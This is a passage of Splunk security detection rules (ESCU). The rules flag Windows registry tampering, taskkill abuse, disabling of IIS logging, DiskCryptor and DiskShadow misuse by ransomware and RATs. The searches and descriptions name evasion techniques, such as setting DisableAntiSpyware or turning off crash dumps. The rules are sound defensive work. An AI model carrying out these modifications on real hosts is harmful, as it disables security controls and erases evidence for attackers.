"StartMenuLogOff") Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_logoff_button_through_registry_filter` [ESCU - Windows Disable Memory Crash Dump - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process that is attempting to disable the ability on Windows to generate a memory crash dump. This was recently identified being utilized by HermeticWiper. To disable crash dumps, the value must be set to 0. This feature is typically modified to perform a memory crash dump when a computer stops unexpectedly because of a Stop error (also known as a blue screen, system crash, or bug check). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process that is attempting to disable the ability on Windows to generate a memory crash dump. This was recently identified being utilized by HermeticWiper. To disable crash dumps, the value must be set to 0. This feature is typically modified to perform a memory crash dump when a computer stops unexpectedly because of a Stop error (also known as a blue screen, system crash, or bug check). action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the Filesystem responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` and `Registry` node. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable Memory Crash Dump - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Data Destruction", "Windows Registry Abuse", "Hermetic Wiper"] action.risk = 1 action.risk.param._risk_message = A process was identified attempting to disable memory crash dumps on $dest$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable Memory Crash Dump - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Data Destruction", "Windows Registry Abuse", "Hermetic Wiper"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a process that is attempting to disable the ability on Windows to generate a memory crash dump. This was recently identified being utilized by HermeticWiper. To disable crash dumps, the value must be set to 0. This feature is typically modified to perform a memory crash dump when a computer stops unexpectedly because of a Stop error (also known as a blue screen, system crash, or bug check). action.notable.param.rule_title = Windows Disable Memory Crash Dump action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry where (Registry.registry_path="*\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled") AND Registry.registry_value_data="0x00000000" by _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.registry_key_name | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_memory_crash_dump_filter` [ESCU - Windows Disable Notification Center - Rule] action.escu = 0 action.escu.enabled = 1 description = The following search identifies a modification of registry to disable the windows notification center feature in a windows host machine. This registry modification removes notification and action center from the notification area on the task bar. This modification are seen in RAT malware to cover their tracks upon downloading other of its component or other payload. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following search identifies a modification of registry to disable the windows notification center feature in a windows host machine. This registry modification removes notification and action center from the notification area on the task bar. This modification are seen in RAT malware to cover their tracks upon downloading other of its component or other payload. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable this windows features. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable Notification Center - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = The Windows notification center was disabled on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable Notification Center - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_value_name= "DisableNotificationCenter" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_notification_center_filter` [ESCU - Windows Disable or Modify Tools Via Taskkill - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to identify potentially malicious processes that terminate other processes using taskkill.exe. This technique has been observed in various malware instances, employed by adversaries and red teamers alike, to forcibly terminate other processes whether they be security products or other legitimate applications as part of their malicious activities. Detecting this anomaly serves as a valuable alert mechanism to identify suspicious processes or malware attempting to evade detection and disrupt system stability. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is designed to identify potentially malicious processes that terminate other processes using taskkill.exe. This technique has been observed in various malware instances, employed by adversaries and red teamers alike, to forcibly terminate other processes whether they be security products or other legitimate applications as part of their malicious activities. Detecting this anomaly serves as a valuable alert mechanism to identify suspicious processes or malware attempting to evade detection and disrupt system stability. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Network administrator can use this application to kill process during audit or investigation. action.escu.creation_date = 2023-09-13 action.escu.modification_date = 2023-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable or Modify Tools Via Taskkill - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["NjRAT"] action.risk = 1 action.risk.param._risk_message = A taskkill process to terminate process is executed on host- $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable or Modify Tools Via Taskkill - Rule action.correlationsearch.annotations = {"analytic_story": ["NjRAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "taskkill.exe" Processes.process IN ("* /f*", "* /t*") Processes.process IN ("* /im*", "* /pid*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_or_modify_tools_via_taskkill_filter` [ESCU - Windows Disable Shutdown Button Through Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious registry modification to disable shutdown button on the logon user. This technique was seen in several malware especially in ransomware family like killdisk malware variant to make the compromised host un-useful and hard to remove other registry modification made on the machine that needs restart to take effect. This windows feature may implement by administrator in some server where shutdown is critical. In that scenario filter of machine and users that can modify this registry is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious registry modification to disable shutdown button on the logon user. This technique was seen in several malware especially in ransomware family like killdisk malware variant to make the compromised host un-useful and hard to remove other registry modification made on the machine that needs restart to take effect. This windows feature may implement by administrator in some server where shutdown is critical. In that scenario filter of machine and users that can modify this registry is needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = This windows feature may implement by administrator in some server where shutdown is critical. In that scenario filter of machine and users that can modify this registry is needed. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable Shutdown Button Through Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Registry modification in "shutdownwithoutlogon" on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable Shutdown Button Through Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" Registry.registry_value_data = "0x00000000") OR (Registry.registry_path="*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" Registry.registry_value_data = "0x00000001")) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_shutdown_button_through_registry_filter` [ESCU - Windows Disable Windows Event Logging Disable HTTP Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies AppCmd.exe being utilized to disable HTTP logging on IIS. Adversaries may perform this action to disable logging and delete the logs so remove any trace or events on disk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1562.002", "T1562", "T1505", "T1505.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies AppCmd.exe being utilized to disable HTTP logging on IIS. Adversaries may perform this action to disable logging and delete the logs so remove any trace or events on disk. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present only if scripts or Administrators are disabling logging. Filter as needed by parent process or other. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable Windows Event Logging Disable HTTP Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "IIS Components"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to disable IIS HTTP Logging. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable Windows Event Logging Disable HTTP Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "IIS Components"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1562.002", "T1562", "T1505", "T1505.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies AppCmd.exe being utilized to disable HTTP logging on IIS. Adversaries may perform this action to disable logging and delete the logs so remove any trace or events on disk. action.notable.param.rule_title = Windows Disable Windows Event Logging Disable HTTP Logging action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where NOT (Processes.parent_process_name IN ("msiexec.exe", "iissetup.exe")) Processes.process_name=appcmd.exe Processes.process IN ("*set config*", "*httplogging*","*dontlog:true*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_windows_event_logging_disable_http_logging_filter` [ESCU - Windows Disable Windows Group Policy Features Through Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious registry modification to disable windows features. These techniques are seen in several ransomware malware to impair the compromised host to make it hard for analyst to mitigate or response from the attack. Disabling these known features make the analysis and forensic response more hard. Disabling these feature is not so common but can still be implemented by the administrator for security purposes. In this scenario filters for users that are allowed doing this is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious registry modification to disable windows features. These techniques are seen in several ransomware malware to impair the compromised host to make it hard for analyst to mitigate or response from the attack. Disabling these known features make the analysis and forensic response more hard. Disabling these feature is not so common but can still be implemented by the administrator for security purposes. In this scenario filters for users that are allowed doing this is needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Disabling these features for legitimate purposes is not a common use case but can still be implemented by the administrators. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Disable Windows Group Policy Features Through Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Registry modification to disable windows group policy features on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Disable Windows Group Policy Features Through Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\*" OR Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\*" Registry.registry_value_name IN ("NoDesktop", "NoFind", "NoControlPanel", "NoFileMenu", "NoSetTaskbar", "NoTrayContextMenu", "TaskbarLockAll", "NoThemesTab","NoPropertiesMyDocuments","NoVisualStyleChoice","NoColorChoice","NoPropertiesMyDocuments") Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_windows_group_policy_features_through_registry_filter` [ESCU - Windows DisableAntiSpyware Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for the Registry Key DisableAntiSpyware set to disable. This is consistent with Ryuk infections across a fleet of endpoints. This particular behavior is typically executed when an ransomware actor gains access to an endpoint and beings to perform execution. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for the Registry Key DisableAntiSpyware set to disable. This is consistent with Ryuk infections across a fleet of endpoints. This particular behavior is typically executed when an ransomware actor gains access to an endpoint and beings to perform execution. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Registry` node. action.escu.known_false_positives = It is unusual to turn this feature off a Windows system since it is a default security control, although it is not rare for some policies to disable it. Although no false positives have been identified, use the provided filter macro to tune the search. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DisableAntiSpyware Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Azorult", "Ryuk Ransomware", "Windows Registry Abuse", "RedLine Stealer", "CISA AA22-264A", "Windows Defense Evasion Tactics", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Windows DisableAntiSpyware registry key set to 'disabled' on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DisableAntiSpyware Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Ryuk Ransomware", "Windows Registry Abuse", "RedLine Stealer", "CISA AA22-264A", "Windows Defense Evasion Tactics", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for the Registry Key DisableAntiSpyware set to disable. This is consistent with Ryuk infections across a fleet of endpoints. This particular behavior is typically executed when an ransomware actor gains access to an endpoint and beings to perform execution. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.notable.param.rule_title = Windows DisableAntiSpyware Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_value_name="DisableAntiSpyware" AND Registry.registry_value_data="0x00000001" by Registry.dest Registry.user Registry.registry_path Registry.registry_value_data | `drop_dm_object_name(Registry)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `windows_disableantispyware_registry_filter` [ESCU - Windows DiskCryptor Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies DiskCryptor process name of dcrypt.exe or internal name dcinst.exe. This utility has been utilized by adversaries to encrypt disks manually during an operation. In addition, during install, a dcrypt.sys driver is installed and requires a reboot in order to take effect. There are no command-line arguments used. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies DiskCryptor process name of dcrypt.exe or internal name dcinst.exe. This utility has been utilized by adversaries to encrypt disks manually during an operation. In addition, during install, a dcrypt.sys driver is installed and requires a reboot in order to take effect. There are no command-line arguments used. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is possible false positives may be present based on the internal name dcinst.exe, filter as needed. It may be worthy to alert on the service name. action.escu.creation_date = 2021-11-15 action.escu.modification_date = 2021-11-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DiskCryptor Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DiskCryptor Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dcrypt.exe" OR Processes.original_file_name=dcinst.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_diskcryptor_usage_filter` [ESCU - Windows Diskshadow Proxy Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = DiskShadow.exe is a Microsoft Signed binary present on Windows Server. It has a scripting mode intended for complex scripted backup operations. This feature also allows for execution of arbitrary unsigned code. This analytic looks for the usage of the scripting mode flags in executions of DiskShadow. During triage, compare to known backup behavior in your environment and then review the scripts called by diskshadow. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = DiskShadow.exe is a Microsoft Signed binary present on Windows Server. It has a scripting mode intended for complex scripted backup operations. This feature also allows for execution of arbitrary unsigned code. This analytic looks for the usage of the scripting mode flags in executions of DiskShadow. During triage, compare to known backup behavior in your environment and then review the scripts called by diskshadow. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators using the DiskShadow tool in their infrastructure as a main backup tool with scripts will cause false positives that can be filtered with `windows_diskshadow_proxy_execution_filter` action.escu.creation_date = 2022-02-15 action.escu.modification_date = 2022-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Diskshadow Proxy Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land"] action.risk = 1 action.risk.param._risk_message = Possible Signed Binary Proxy Execution on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Diskshadow Proxy Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = DiskShadow.exe is a Microsoft Signed binary present on Windows Server. It has a scripting mode intended for complex scripted backup operations. This feature also allows for execution of arbitrary unsigned code. This analytic looks for the usage of the scripting mode flags in executions of DiskShadow. During triage, compare to known backup behavior in your environment and then review the scripts called by diskshadow. action.notable.param.rule_title = Windows Diskshadow Proxy Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_diskshadow` (Processes.process=*-s* OR 